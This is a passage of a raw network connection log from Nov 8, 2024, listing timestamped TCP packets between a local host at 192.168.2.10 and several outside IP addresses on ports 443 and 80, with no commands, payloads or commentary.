Nov 8, 2024 16:15:39.122868061 CET	443	49801	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.122876883 CET	443	49801	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.126264095 CET	49808	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.126282930 CET	443	49808	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.126425982 CET	49808	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.126655102 CET	49808	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.126667976 CET	443	49808	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.694999933 CET	80	49803	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:39.696516037 CET	49810	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:39.696568012 CET	443	49810	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:39.696765900 CET	49810	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:39.697077036 CET	49810	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:39.697092056 CET	443	49810	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:39.736287117 CET	49803	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:39.811377048 CET	443	49805	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.811850071 CET	49805	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.811865091 CET	443	49805	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.812717915 CET	443	49804	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.813590050 CET	49805	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.813605070 CET	443	49805	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.814014912 CET	49804	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.814026117 CET	443	49804	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.814562082 CET	49804	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.814568043 CET	443	49804	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.824529886 CET	443	49806	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.824975967 CET	49806	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.824985027 CET	443	49806	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.825304985 CET	443	49807	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.825515985 CET	49806	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.825520992 CET	443	49806	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.825767994 CET	49807	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.825783968 CET	443	49807	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.826212883 CET	49807	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.826221943 CET	443	49807	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.894058943 CET	443	49808	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.894561052 CET	49808	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.894591093 CET	443	49808	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.895275116 CET	49808	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.895292044 CET	443	49808	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.944174051 CET	443	49805	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.945229053 CET	443	49804	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.945223093 CET	443	49805	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.945318937 CET	443	49804	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.945369005 CET	49804	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.945374012 CET	49805	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.945538044 CET	49805	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.945564985 CET	443	49805	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.945580959 CET	49804	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.945581913 CET	49805	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.945589066 CET	443	49805	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.945602894 CET	443	49804	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.945615053 CET	49804	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.945622921 CET	443	49804	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.950278044 CET	49811	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.950329065 CET	443	49811	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.950387001 CET	49811	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.950412989 CET	49812	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.950423956 CET	443	49812	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.950479984 CET	49812	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.950701952 CET	49812	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.950711012 CET	443	49812	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.950721979 CET	49811	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.950737000 CET	443	49811	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.955400944 CET	443	49807	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.955447912 CET	443	49806	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.955508947 CET	443	49806	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.955559969 CET	49806	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.955651045 CET	443	49807	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.955701113 CET	49807	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.955764055 CET	49807	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.955764055 CET	49807	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.955775023 CET	443	49807	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.955784082 CET	443	49807	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.955823898 CET	49806	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.955835104 CET	443	49806	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.955845118 CET	49806	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.955852985 CET	443	49806	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.959027052 CET	49813	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.959041119 CET	443	49813	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.959121943 CET	49813	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.959248066 CET	49813	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.959254980 CET	443	49813	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.959366083 CET	49814	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.959377050 CET	443	49814	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:39.959433079 CET	49814	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.959510088 CET	49814	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:39.959518909 CET	443	49814	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.030834913 CET	443	49808	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.030939102 CET	443	49808	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.030989885 CET	49808	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.031224966 CET	49808	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.031251907 CET	443	49808	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.031269073 CET	49808	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.031275988 CET	443	49808	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.034564018 CET	49815	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.034605980 CET	443	49815	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.034671068 CET	49815	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.034909964 CET	49815	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.034921885 CET	443	49815	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.303307056 CET	443	49810	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:40.314372063 CET	49810	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:40.314409018 CET	443	49810	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:40.423866034 CET	49677	443	192.168.2.10	20.42.65.85
Nov 8, 2024 16:15:40.461014986 CET	443	49810	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:40.461129904 CET	443	49810	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:40.461522102 CET	49810	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:40.462162018 CET	49810	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:40.466459990 CET	49803	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:40.467494011 CET	49816	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:40.471806049 CET	80	49803	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:40.471931934 CET	49803	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:40.472352028 CET	80	49816	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:40.472429037 CET	49816	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:40.472507954 CET	49816	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:40.477478027 CET	80	49816	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:40.679559946 CET	443	49813	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.680254936 CET	49813	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.680275917 CET	443	49813	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.680767059 CET	49813	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.680773020 CET	443	49813	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.681237936 CET	443	49812	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.683334112 CET	49812	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.683346987 CET	443	49812	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.684283972 CET	49812	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.684289932 CET	443	49812	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.706346035 CET	443	49811	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.707112074 CET	49811	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.707158089 CET	443	49811	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.707684040 CET	49811	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.707690954 CET	443	49811	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.709436893 CET	443	49814	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.709904909 CET	49814	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.709913015 CET	443	49814	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.710589886 CET	49814	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.710594893 CET	443	49814	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.763451099 CET	443	49815	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.764271021 CET	49815	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.764290094 CET	443	49815	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.764878988 CET	49815	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.764885902 CET	443	49815	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.809062004 CET	443	49813	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.809181929 CET	443	49813	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.809576988 CET	49813	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.809636116 CET	49813	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.809636116 CET	49813	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.809654951 CET	443	49813	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.809663057 CET	443	49813	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.811435938 CET	443	49812	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.811496019 CET	443	49812	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.811729908 CET	49812	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.812434912 CET	49812	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.812434912 CET	49812	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.812452078 CET	443	49812	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.812460899 CET	443	49812	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.814990044 CET	49817	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.815042973 CET	443	49817	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.815253973 CET	49817	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.816479921 CET	49817	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.816497087 CET	443	49817	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.817826986 CET	49818	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.817851067 CET	443	49818	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.818499088 CET	49818	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.819391966 CET	49818	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.819405079 CET	443	49818	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.839509010 CET	443	49811	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.839581013 CET	443	49811	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.839796066 CET	49811	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.841029882 CET	49811	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.841038942 CET	443	49811	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.841048956 CET	49811	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.841053009 CET	443	49811	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.842312098 CET	443	49814	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.842478037 CET	443	49814	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.842622995 CET	49814	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.843913078 CET	49814	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.843930006 CET	443	49814	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.843949080 CET	49814	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.843955040 CET	443	49814	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.849936008 CET	49819	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.849973917 CET	443	49819	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.850055933 CET	49819	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.850179911 CET	49819	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.850193977 CET	443	49819	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.851269007 CET	49820	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.851300001 CET	443	49820	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.851906061 CET	49820	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.853318930 CET	49820	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.853333950 CET	443	49820	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.891752005 CET	443	49815	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.891882896 CET	443	49815	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.892093897 CET	49815	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.908003092 CET	49815	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.908003092 CET	49815	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.908031940 CET	443	49815	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.908041000 CET	443	49815	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.913892031 CET	49821	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.913954020 CET	443	49821	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:40.914031982 CET	49821	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.915286064 CET	49821	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:40.915304899 CET	443	49821	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.121926069 CET	80	49816	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:41.141686916 CET	49822	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:41.141721964 CET	443	49822	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:41.142044067 CET	49822	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:41.143115044 CET	49822	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:41.143130064 CET	443	49822	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:41.173791885 CET	49816	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:41.553457975 CET	443	49818	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.563740015 CET	49818	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.563774109 CET	443	49818	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.565324068 CET	49818	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.565330029 CET	443	49818	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.581137896 CET	443	49819	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.581574917 CET	49819	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.581605911 CET	443	49819	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.582813978 CET	49819	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.582819939 CET	443	49819	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.590539932 CET	443	49820	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.591308117 CET	49820	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.591341019 CET	443	49820	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.592232943 CET	49820	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.592242002 CET	443	49820	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.593996048 CET	443	49817	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.594501019 CET	49817	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.594513893 CET	443	49817	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.595122099 CET	49817	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.595125914 CET	443	49817	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.659024954 CET	443	49821	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.664102077 CET	49821	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.664140940 CET	443	49821	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.671032906 CET	49821	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.671057940 CET	443	49821	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.691814899 CET	443	49818	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.691879034 CET	443	49818	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.691926956 CET	49818	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.693480968 CET	49818	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.693502903 CET	443	49818	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.693514109 CET	49818	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.693520069 CET	443	49818	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.697557926 CET	49823	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.697602034 CET	443	49823	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.697659016 CET	49823	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.697829008 CET	49823	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.697839022 CET	443	49823	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.720662117 CET	443	49820	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.720691919 CET	443	49820	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.720769882 CET	443	49820	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.720808983 CET	49820	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.720851898 CET	49820	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.724381924 CET	443	49817	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.724407911 CET	443	49817	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.724450111 CET	49817	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.724458933 CET	443	49817	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.724497080 CET	49817	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.724963903 CET	49820	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.724986076 CET	443	49820	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.725024939 CET	49820	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.725030899 CET	443	49820	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.726993084 CET	443	49819	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.727195978 CET	443	49819	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.727355003 CET	49819	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.727451086 CET	49817	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.727468014 CET	443	49817	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.727478027 CET	49817	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.727483988 CET	443	49817	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.729111910 CET	49819	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.729119062 CET	443	49819	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.729130030 CET	49819	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.729132891 CET	443	49819	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.733185053 CET	49824	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.733221054 CET	443	49824	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.733280897 CET	49824	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.735328913 CET	49824	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.735342979 CET	443	49824	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.735713959 CET	49825	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.735752106 CET	443	49825	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.735802889 CET	49825	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.736020088 CET	49825	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.736032963 CET	443	49825	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.736593008 CET	49826	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.736609936 CET	443	49826	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.736659050 CET	49826	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.736908913 CET	49826	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.736921072 CET	443	49826	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.744333029 CET	443	49822	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:41.746094942 CET	49822	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:41.746113062 CET	443	49822	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:41.798600912 CET	443	49821	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.798634052 CET	443	49821	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.798692942 CET	49821	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.798697948 CET	443	49821	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.798841953 CET	49821	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.799160004 CET	49821	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.799184084 CET	443	49821	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.799195051 CET	49821	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.799201965 CET	443	49821	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.802161932 CET	49827	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.802205086 CET	443	49827	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.802279949 CET	49827	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.802516937 CET	49827	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:41.802536011 CET	443	49827	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:41.898992062 CET	443	49822	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:41.899112940 CET	443	49822	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:41.899158001 CET	49822	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:41.900032997 CET	49822	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:42.432173014 CET	443	49823	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.432943106 CET	49823	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.432974100 CET	443	49823	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.433415890 CET	49823	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.433423996 CET	443	49823	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.457741976 CET	443	49825	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.458242893 CET	49825	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.458265066 CET	443	49825	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.458722115 CET	49825	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.458726883 CET	443	49825	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.464426994 CET	443	49824	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.465305090 CET	49824	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.465305090 CET	49824	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.465329885 CET	443	49824	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.465342999 CET	443	49824	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.527990103 CET	443	49826	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.528563023 CET	49826	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.528583050 CET	443	49826	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.529170036 CET	49826	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.529179096 CET	443	49826	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.563141108 CET	443	49823	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.563163042 CET	443	49823	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.563221931 CET	443	49823	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.563251019 CET	49823	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.563457012 CET	49823	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.563529968 CET	49823	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.563549995 CET	443	49823	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.563574076 CET	49823	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.563580990 CET	443	49823	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.566391945 CET	49828	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.566446066 CET	443	49828	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.566651106 CET	49828	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.566651106 CET	49828	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:42.566685915 CET	443	49828	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:42.574764967 CET	443	49827	13.107.246.45	192.168.2.10
